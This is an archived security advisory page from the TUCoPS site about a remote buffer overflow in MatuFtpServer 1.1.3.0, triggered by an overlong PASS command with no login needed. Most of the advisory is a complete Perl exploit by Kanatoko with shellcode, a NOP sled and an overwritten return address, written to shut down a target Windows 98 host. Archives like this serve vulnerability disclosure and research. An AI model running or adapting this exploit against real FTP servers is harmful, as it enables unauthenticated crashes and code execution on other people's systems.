Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Windows Net Apps :: win5362.htm

MatuFtpServer remote buffer overflow



23th May 2002 [SBWID-5362]
COMMAND

	MatuFtpServer remote buffer overflow

SYSTEMS AFFECTED

	MatuFtpServer 1.1.3.0(1.13)

PROBLEM

	In Kanatoko [http://www.jumperz.net/] post :
	

	We found a security vulnerability in the product  that  allow  attackers
	to execute arbitrary code on the server using a buffer overflow attack.
	

	By sending a long string like
	

	PASS AAAAAAAAAAAAA....AAAAAAAAAAAAAAAAAA<CR><LF>

	

	an attacker can cause a stack overflow.
	

	Note that there is no  need  to  send  \"USER\"  command.  So  valid  or
	anonymous user account is not needed to execute this attack.
	

	 Example

	 =======

	

	This exploit code will shutdown target host.
	

	#!/usr/local/bin/perl

	

	#-----------------------------------------------

	# MatuFtpServer 1.1.3.0 exploit ( for Windows98 )

	# written by Kanatoko <anvil@jumperz.net>

	# http://www.jumperz.net/

	#-----------------------------------------------

	

	use Socket;

	

	$connect_host = \"target.example.com\";

	$port = 21;

	$iaddr = inet_aton( $connect_host ) || die \"Host Resolve Error.\\n\";

	$sock_addr = pack_sockaddr_in( $port, $iaddr );

	socket( SOCKET, PF_INET, SOCK_STREAM, 0 ) || die \"Socket Error.\\n\";

	connect( SOCKET, $sock_addr ) || die \"Connect Error\\n\";

	select( SOCKET ); $|=1; select( STDOUT );

	

	    #egg written by UNYUN (http://www.shadowpenguin.org/)

	    #16bytes

	$egg  = \"\\x43\\x43\\x43\\x43\\x43\\x53\\x53\\x53\";

	$egg .= \"\\xB8\\x2D\\x23\\xF5\\xBF\\x48\\x50\\xC3\";

	

	    #0x0177F984

	$buf  = \"\\x90\" x 1032;

	$buf .= $egg;

	$buf .= \"\\x8C\\xF9\\x77\\x01\";

	$buf .= \"A\" x 696;

	

	print SOCKET \"PASS $buf\\r\\n\";

	$hoge = <SOCKET>; print $hoge;

	

SOLUTION

	None yet


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH